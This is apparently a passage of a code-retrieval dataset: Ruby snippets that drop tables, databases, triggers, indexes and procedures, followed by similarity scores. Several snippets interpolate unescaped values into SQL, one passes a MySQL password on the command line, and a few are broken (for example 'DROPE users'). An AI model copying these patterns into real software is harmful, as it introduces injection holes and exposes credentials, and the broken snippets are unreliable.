"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_table\n db.drop_table(table_name)\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete(sql, name = nil) end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def delete_sql(string) # :nodoc:\n chk_conn\n execute(string)\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def delete_sql(sql, name = nil)\n update_sql(sql, name)\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def dropUserTable\n @conn.exec(\"DROPE users\")\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def dropUserTable(tableName)\n @conn.exec(\"DROP TABLE #{tableName}\")\n end",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def delete(sql, name = nil)\n delete_sql(sql, name)\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_replication_trigger(trigger_name, table_name)\n %w(insert update delete).each do |action|\n execute \"DROP TRIGGER `#{trigger_name}_#{action}`;\"\n end\n execute \"DROP PROCEDURE `#{trigger_name}`;\"\n end",
"def uninstall_on(db, options = {})\n buffer, sql = \"\", \"\"\n all_objects_in_order.reverse.each{|o| \n sql = o.to_clean_sql(db)\n (buffer << sql << \";\\n\") unless sql.nil? or sql.empty?\n }\n execute_ddl(db, buffer, options)\n db\n end",
"def drop_view(name)\n execute(\"DROP VIEW #{name}\")\n end",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}\"\n end",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}\"\n end",
"def remove_stock(db,stock_ticker)\r\n db.execute(<<-SQL\r\n DELETE FROM stocks2 \r\n Where stock_ticker=\"#{stock_ticker}\";\r\n SQL\r\n )\r\n puts \"===================================================\"\r\n puts \"#{stock_ticker} has been removed from the database.\"\r\n puts \"===================================================\"\r\nend",
"def drop_movies_table\n c = connect\n c.exec \"DROP TABLE IF EXISTS movies;\" \n c.close\nend",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}\"\n end",
"def exec_delete(sql, name, binds)\n execute(sql, name, binds)\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def down\n \tdrop_table :solution_submissions\n\n # \texecute <<-SQL\n # \t\tDROP TYPE s_status;\n # \tSQL\n\n # \texecute <<-SQL\n # \t\tDROP TYPE lang;\n # \tSQL\n\n end",
"def drop_table(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n raise \"Table does not exist!\" unless table_exists?(tablename)\r\n @table_hash.delete(tablename)\r\n\r\n return @engine.delete_table(tablename)\r\n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def drop_mysql_database\n MysqlUtils.drop_mysql_database(database_name)\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))} ON #{quote_schema_table(table)}\"\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def drop_tables!\n migrate(:down)\n end",
"def drop_column(table, *args)\n alter_table(table) {drop_column(*args)}\n end",
"def drop_column(table, *args)\n alter_table(table) {drop_column(*args)}\n end",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def drop(database = \"\", user=\"\", password=\"\")\n if (user.empty?)\n user = @user\n end\n if (password.empty?)\n password = @password\n end\n if (database.empty?)\n database = @database\n end\n check_params(user,password,database)\n\n cmd = \"mysql --user=#{user} --password=#{password} -e 'drop database #{database};' #{database}\"\n # puts \"cmd = \" + cmd\n system cmd\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def uninstall!(database)\n drop_extension(database)\n make_uninstall(database)\n end",
"def drop_language(name, opts=OPTS)\n self << drop_language_sql(name, opts)\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def drop_sequence_statement(repository, property)\n \"DROP SEQUENCE IF EXISTS #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def drop_index\n call(ft_drop)\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop _args\n \"drop _args;\" \n end",
"def db_remove prod\n $db.query \"DELETE FROM produtos WHERE prod=?\", prod\nend",
"def drop_index_sql(table, op)\n sch, _ = schema_and_table(table)\n \"DROP INDEX#{' CONCURRENTLY' if op[:concurrently]}#{' IF EXISTS' if op[:if_exists]} #{\"#{quote_identifier(sch)}.\" if sch}#{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}#{' CASCADE' if op[:cascade]}\"\n end",
"def delete_characters\n @db.execute(\"DROP TABLE Characters\")\n end",
"def drop_table(*names)\n names.each {|n| execute(drop_table_sql(n))}\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop_trigger(table, name, opts=OPTS)\n self << drop_trigger_sql(table, name, opts)\n end",
"def drop_view(name, **kwargs)\n kwargs[:sqlite3] = !!(adapter_name =~ /sqlite/i)\n\n execute build_drop_view_query(name, **kwargs)\n end",
"def exec__psql_db_batch__drop_owned_current_user *args\n psql_db = psql_db__sample_example\n drop_all_batch = psql_db_batch__db_queries_method psql_db, :db_queries__drop_owned_current_user\n batch = drop_all_batch\n batch_commands batch\n end",
"def drop\n Aptly::runcmd \"aptly mirror drop #{@name.quote}\"\n end",
"def invoke_drop(method_or_key); end",
"def exec_delete(sql, name = nil, binds = []) #:nodoc:\r\n log(sql, \"delete\", binds) { query(sql, binds) }\r\n end",
"def drop_schema(schema)\n execute \"DROP SCHEMA #{schema} RESTRICT\", 'Drop Schema'\n end",
"def delete()\n db = PG connect( {dbname: 'bounty_hunter',\n host: 'localhost'\n })\n sql = 'DELETE from bounty_hunter'\n db.prepare('delete_one', sql)\n db.exec_prepared('delete_one', value)\n db.close()\nend"
] |
[
"0.8369946",
"0.80704874",
"0.8003502",
"0.7982197",
"0.7879706",
"0.76229805",
"0.76229805",
"0.75548965",
"0.7380597",
"0.71375334",
"0.71096754",
"0.70644176",
"0.68965197",
"0.68872184",
"0.68156517",
"0.6793039",
"0.67553425",
"0.6700025",
"0.66806155",
"0.66347694",
"0.6625797",
"0.6619604",
"0.6598128",
"0.6590546",
"0.65731144",
"0.6572026",
"0.6569278",
"0.6563033",
"0.65590364",
"0.6521623",
"0.65032053",
"0.6486281",
"0.64653194",
"0.64653194",
"0.639045",
"0.63517964",
"0.63397706",
"0.6338351",
"0.63306344",
"0.6319139",
"0.6314238",
"0.63052225",
"0.6293412",
"0.62834543",
"0.62778926",
"0.62587357",
"0.6250159",
"0.6236936",
"0.61820924",
"0.61646056",
"0.6163628",
"0.6152445",
"0.6144435",
"0.61410135",
"0.6116182",
"0.61127067",
"0.61058915",
"0.61058915",
"0.61019045",
"0.6089666",
"0.6080112",
"0.606983",
"0.6059789",
"0.6054124",
"0.6053217",
"0.6044683",
"0.6038642",
"0.602959",
"0.602225",
"0.6017064",
"0.6010362",
"0.6008879",
"0.6008879",
"0.5983149",
"0.5973049",
"0.5971153",
"0.59678966",
"0.59483254",
"0.5942069",
"0.59291595",
"0.5921536",
"0.59135234",
"0.5900768",
"0.5887252",
"0.5875814",
"0.5875105",
"0.58731365",
"0.5867684",
"0.586719",
"0.5866774",
"0.58659995",
"0.5862043",
"0.5857486",
"0.58499116",
"0.5849035",
"0.58430636",
"0.58283234",
"0.58243114",
"0.5823378",
"0.5822092"
] |
0.8339578
|
1
|
Support :if_exists, :cascade, and :concurrently options.
|
def drop_index_sql(table, op)
sch, _ = schema_and_table(table)
"DROP INDEX#{' CONCURRENTLY' if op[:concurrently]}#{' IF EXISTS' if op[:if_exists]} #{"#{quote_identifier(sch)}." if sch}#{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}#{' CASCADE' if op[:cascade]}"
end
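
For illustration, a hedged usage sketch: each option flag maps one-to-one onto an SQL keyword. This assumes a Sequel PostgreSQL Database handle DB (for example, DB = Sequel.connect('postgres://localhost/mydb')); DB.drop_index is the public entry point that renders its options through a helper like the one above, though that exact call chain is an assumption rather than something this record states.

# Hedged sketch; DB is an assumed Sequel PostgreSQL connection, and
# "items_name_index" is the default index name Sequel derives from
# the table and column.
DB.drop_index(:items, :name)
# => DROP INDEX "items_name_index"
DB.drop_index(:items, :name, if_exists: true)
# => DROP INDEX IF EXISTS "items_name_index"
DB.drop_index(:items, :name, concurrently: true)
# => DROP INDEX CONCURRENTLY "items_name_index"
DB.drop_index(:items, :name, cascade: true)
# => DROP INDEX "items_name_index" CASCADE

PostgreSQL refuses to run DROP INDEX CONCURRENTLY inside a transaction block, which is why :concurrently is worth surfacing as an explicit option rather than folding into a default.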
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def continue_on_exists_proc; end",
"def on_exists_proc; end",
"def exists?; end",
"def continue_on_exists_proc=(_arg0); end",
"def on_exists_proc=(_arg0); end",
"def exists?\n self.ensure == :present\n end",
"def exists?\n false\n end",
"def exists?\n false\n end",
"def exists?\n true\n end",
"def exists?\n !!async\n end",
"def exists!\n @exists = true\n end",
"def exists_bulk_method(states = [nil, :found])\n prepare_environment\n @item = @resource_type.new(@client, @data)\n return true if empty_data_check(states)\n @property_hash[:ensure] == :present\nend",
"def exists\n @deleted = false\n @exists = true\n end",
"def exist\n\treturn true\n end",
"def exist?\n true\n end",
"def exist?(name, options = T.unsafe(nil)); end",
"def create_if_not_exists\n args = [\n [available_list_key(), taken_hash_key(), created_at_key()],\n [@resource_count, @expiration, Time.now.to_f()]\n ]\n $redis.eval(create_script(), *args)\n end",
"def exists?\n fail NotImplementedError\n end",
"def exists?()\n end",
"def existent; end",
"def exists?\n\t\treturn false\n\tend",
"def exist?\n raise NotImplementedError\n end",
"def resource_exists?\n reload!\n @exists = true\n rescue Google::Cloud::NotFoundError\n @exists = false\n end",
"def exist?\n @exists\n end",
"def supports_indexes_in_create?\n false\n end",
"def supports_indexes_in_create?\n false\n end",
"def exist?\n nil\n end",
"def existing?\n @existing\n end",
"def exists? args = {}\n RedisModelExtension::Database.redis {|r| r.exists(self.name.constantize.generate_key(args)) }\n end",
"def exists?\n properties[:ensure] != :absent\n end",
"def add_if_not_exists()\n\tif record_exists()\n\t\tprintf(\"EXISTS %s\\n\",self.digest)\n\t\treturn 0\n\tend\n\tsave()\n\treturn 1\nend",
"def supports_create_table_if_not_exists?\n true\n end",
"def batch_exist?(id)\n mutex(id) do |bid|\n redis.exists(bid)\n end\n end",
"def exists?\r\n !new? && self.class.exists?(id, prefix_options)\r\n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def find_or_create!()\n end",
"def exists(id, options = ExistsOptions.new)\n resp = @backend.document_exists(bucket_name, \"#{@scope_name}.#{@name}\", id, options.timeout)\n ExistsResult.new do |res|\n res.status = resp[:status]\n res.partition_id = resp[:partition_id]\n res.cas = resp[:cas] if res.status != :not_found\n end\n end",
"def exists?(identifier, configuration = {}); true; end",
"def merge_if_exists!\n t = merge_if_exists || self\n t.save!\n end",
"def create?\n create = self[:create]\n return create unless create.nil?\n options.fetch 'create', false\n end",
"def exists?()\n #This is a stub, used for indexing\n end",
"def exists?\n !new? && self.class.exists?(id, prefix_options)\n end",
"def exist?(k, ignored_options = nil)\n handle_fork\n _exist? k\n end",
"def data_query_exists?\n # TODO: add_data_query.php says: \"If the data query was already associated, it will be reindexed\"\n # we may need to figure it out somehow to avoid reindexes.\n #\n # use --check patch: returns true if data query does not exist, returns false if data query exists\n # will raise exception, when option not supported\n r = add_data_query(params + ' --check')\n !r\nrescue\n false\nend",
"def exists?\n Puppet.debug(self.class.to_s.split('::').last + ': Calling exists method : ')\n @property_hash[:ensure] == :present\n end",
"def exists(_obj)\n raise NotImplementedError\n end",
"def exists?\n SideJob.redis.sismember 'jobs', id\n end",
"def exist?\n @created\n end",
"def _create_record(options = {})\n super\n update_index if create_needs_index? && options.fetch(:update_index, true)\n true\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?(object); end",
"def exists?(object); end",
"def exists?\n !new? && self.class.exists?(id)\n end",
"def remove_should_check_existing?\n true\n end",
"def exist?\n NotImplemented\n end",
"def exist?\n NotImplemented\n end",
"def aws_obj_exists?(opts)\n opts[:obj].exists?\n end",
"def exists?\n retrieve\n true\n rescue Error::NoSuchKey\n false\n end",
"def apply_orphan_strategy\n true\n end",
"def apply_orphan_strategy\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def create?\n true\n end",
"def exist?(name, options = nil)\n res = super(name, options)\n res || false\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?\n @property_hash and [:running, :pending].include?(@property_hash[:ensure])\n end",
"def create?\n false\n end",
"def exists?\n @exists == true\n end",
"def exist?\n @resource.exist?\n end",
"def load_with_primary_key_lookup?(opts, dynamic_opts)\n opts[:type] == :many_to_one &&\n !dynamic_opts[:callback] && \n opts.send(:cached_fetch, :many_to_one_pk_lookup){opts.primary_key == opts.associated_class.primary_key}\n end",
"def exists?\n begin \n CouchDB.get uri\n true\n rescue\n false\n end \n end",
"def remove_should_check_existing?\n false\n end",
"def add_stored(entry, src_path, &continue_on_exists_proc); end",
"def ensure_exists\n database.ensure_exists(self)\n end",
"def find_or_create_by\n end",
"def supports_concurrent_refreshes?\n postgresql_version >= 90400\n end",
"def exists?\n load!\n true\n rescue RecordNotFound\n false\n end",
"def supports_foreign_keys_in_create?\n supports_foreign_keys?\n end",
"def exists(*args); end",
"def exist?\n @lock.synchronize { valid? }\n end",
"def exists?\n is_binded\n end",
"def save\n if exists?\n update_attributes\n else\n if !create.nil?\n true\n else\n false\n end\n end\n end",
"def auto_vivify?\n !fast?\n end",
"def exists?(id, options = {})\r\n id && !find_single(id, options).nil?\r\n rescue ActiveResource::ResourceNotFound\r\n false\r\n end",
"def create_or_update_index\n # check if index is created\n if index_exists?\n IndexJob.perform_later(self.class.name, 'update', id)\n else\n IndexJob.perform_later(self.class.name, 'index', id)\n end\n end",
"def exists?\n !new? && self.class.exists?(to_param, :params => prefix_options)\n end",
"def file_exists\n end",
"def exists? force: false\n return resource_exists? if force\n # If we have a value, return it\n return @exists unless @exists.nil?\n # Always true if we have a gapi_json object\n return true if resource?\n resource_exists?\n end",
"def exists?\n request :head\n true\n rescue Stretcher::RequestError::NotFound\n false\n end",
"def _create\n true\n end",
"def exist?\n !find_exists.nil?\n end",
"def resource_exists?\n ciudades\n end",
"def exists?\n persistent? && (filename && filename.exist?)\n end",
"def exists?\n @property_hash[:ensure] == :present\n end"
] |
[
"0.6839439",
"0.6661225",
"0.6396953",
"0.6232628",
"0.6209676",
"0.60973483",
"0.5978841",
"0.5978841",
"0.5968392",
"0.5937667",
"0.5933376",
"0.59019464",
"0.57371604",
"0.57335764",
"0.5651571",
"0.5592412",
"0.55716753",
"0.5569275",
"0.5567538",
"0.5565487",
"0.5559403",
"0.55492723",
"0.55298316",
"0.54879",
"0.5486587",
"0.5486587",
"0.5484674",
"0.54729617",
"0.5466861",
"0.5433002",
"0.54216295",
"0.54213715",
"0.5418389",
"0.5412478",
"0.5408144",
"0.54059136",
"0.540217",
"0.5374395",
"0.53669834",
"0.53633994",
"0.5356759",
"0.5346346",
"0.5346063",
"0.53274775",
"0.5314363",
"0.5305016",
"0.5286538",
"0.52730405",
"0.5268609",
"0.52677834",
"0.52677834",
"0.5262751",
"0.5262751",
"0.5244908",
"0.52440584",
"0.52423906",
"0.52423906",
"0.52087647",
"0.5208004",
"0.5199909",
"0.5199909",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51934314",
"0.51894134",
"0.51867634",
"0.51867634",
"0.51867634",
"0.5182699",
"0.5175367",
"0.516273",
"0.51626486",
"0.51559937",
"0.51429147",
"0.5139134",
"0.513157",
"0.51195383",
"0.511369",
"0.51112264",
"0.5104724",
"0.5092759",
"0.5092531",
"0.5089611",
"0.5088339",
"0.50852627",
"0.50842667",
"0.50809294",
"0.50802124",
"0.50797296",
"0.5073121",
"0.5071332",
"0.50610775",
"0.5060701",
"0.5057338",
"0.5050608",
"0.50499046",
"0.5048138"
] |
0.0
|
-1
|
SQL for dropping a procedural language from the database.
|
def drop_language_sql(name, opts=OPTS)
"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}"
end
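
A hedged sketch of how this helper is reached: the drop_language wrapper that appears among the candidate snippets above appends the generated statement to the database. DB is an assumed Sequel PostgreSQL connection, and the language names are purely illustrative.

# Hedged sketch; assumes the named procedural languages are installed.
DB.drop_language(:plperl)
# => DROP LANGUAGE plperl
DB.drop_language(:plperl, if_exists: true, cascade: true)
# => DROP LANGUAGE IF EXISTS plperl CASCADE

CASCADE additionally drops objects that depend on the language, such as functions written in it; IF EXISTS turns a missing language into a no-op instead of an error.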
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_language(name, opts=OPTS)\n self << drop_language_sql(name, opts)\n end",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def to_drop_database_sql(db)\n db.send(:drop_database_sql, self.name, {})\n end",
"def drop_translated_table\n self.connection.drop_table translation_table_name\n end",
"def down\n \tdrop_table :solution_submissions\n\n # \texecute <<-SQL\n # \t\tDROP TYPE s_status;\n # \tSQL\n\n # \texecute <<-SQL\n # \t\tDROP TYPE lang;\n # \tSQL\n\n end",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def down\n \tdrop_table :problems\n\n \t#execute <<-SQL\n \t#\tDROP TYPE difficulty;\n \t#SQL\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete_sql(sql, name = nil)\n update_sql(sql, name)\n end",
"def delete_code(cheatsheet_db, language, delete_by, delete_this)\n cheatsheet_db.execute(\"DELETE FROM #{language} WHERE #{delete_by}=#{delete_this}\")\nend",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def delete(sql, name = nil) end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def delete_sql(string) # :nodoc:\n chk_conn\n execute(string)\n end",
"def delete_characters\n @db.execute(\"DROP TABLE Characters\")\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def to_maql_drop\n maql = \"\"\n [ attributes, facts ].each do |obj|\n maql += obj.to_maql_drop\n end\n maql += \"DROP {#{self.identifier}};\\n\"\n end",
"def uninstall_on(db, options = {})\n buffer, sql = \"\", \"\"\n all_objects_in_order.reverse.each{|o| \n sql = o.to_clean_sql(db)\n (buffer << sql << \";\\n\") unless sql.nil? or sql.empty?\n }\n execute_ddl(db, buffer, options)\n db\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def destroy\n @language_type.destroy\n\n head :no_content\n end",
"def delete(sql, name = nil)\n delete_sql(sql, name)\n end",
"def to_sql_drop_namespace(db)\n if db.supports_schemas?\n db.send(:drop_schema_sql, self.name, {})\n else\n \"\"\n end\n end",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def drop_sequence_statement(repository, property)\n \"DROP SEQUENCE IF EXISTS #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def db_remove\n \"DELETE\" + from_table_where + sql_match_conditions\n end",
"def delete(database)\n <<-EOS.chomp\n#{read(database)}\n#{database[:id]}.destroy\n EOS\n end",
"def to_drop_constraint_sql(db)\n if db.supports_external_drop_constraints?\n gen = ::Sequel::Schema::AlterTableGenerator.new(db)\n gen.drop_constraint(self.name)\n db.send(:alter_table_sql_list, relvar.namespace_qualified_name(db), gen.operations)[0]\n else\n \"\"\n end\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def delete()\n db = PG connect( {dbname: 'bounty_hunter',\n host: 'localhost'\n })\n sql = 'DELETE from bounty_hunter'\n db.prepare('delete_one', sql)\n db.exec_prepared('delete_one', value)\n db.close()\nend",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def delete_from_sql(sql)\n sql << ' FROM '\n source_list_append(sql, @opts[:from][0..0])\n end",
"def destroy\n @language_dialect.destroy\n respond_to do |format|\n format.html { redirect_to language_dialects_url, notice: 'Language dialect was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def exec__psql_db_batch__drop_owned_current_user *args\n psql_db = psql_db__sample_example\n drop_all_batch = psql_db_batch__db_queries_method psql_db, :db_queries__drop_owned_current_user\n batch = drop_all_batch\n batch_commands batch\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def db_destroy_postgresql(*args)\n\n\t\t\tcmd_db_disconnect()\n\n\t\t\treturn if ! db_find_tools(%W{dropdb})\n\n\t\t\tinfo = db_parse_db_uri_postgresql(args[0])\n\t\t\targv = []\n\n\t\t\tif (info[:user])\n\t\t\t\targv.push('-U')\n\t\t\t\targv.push(info[:user])\n\t\t\tend\n\n\t\t\tif (info[:pass])\n\t\t\t\tprint()\n\t\t\t\tprint_status(\"Warning: You will need to enter the password at the prompts below\")\n\t\t\t\tprint()\n\t\t\t\targv.push('-W')\n\t\t\tend\n\n\t\t\tif (info[:host])\n\t\t\t\targv.push('-h')\n\t\t\t\targv.push(info[:host])\n\t\t\tend\n\n\t\t\tif (info[:port])\n\t\t\t\targv.push('-p')\n\t\t\t\targv.push(info[:port])\n\t\t\tend\n\n\t\t\tcargs = argv.map{|c| \"'#{c}' \"}.join\n\t\t\tsystem(\"dropdb #{cargs} #{info[:name]}\")\n\t\tend",
"def delete_queries\n [\n \"DROP TRIGGER tr_#{suffix} ON #{src_table};\",\n \"DROP FUNCTION fn_#{suffix}();\",\n \"DROP TRIGGER tr_#{suffix}_cleaner ON #{surveys_table};\",\n \"DROP FUNCTION fn_#{suffix}_cleaner();\"\n ]\n end",
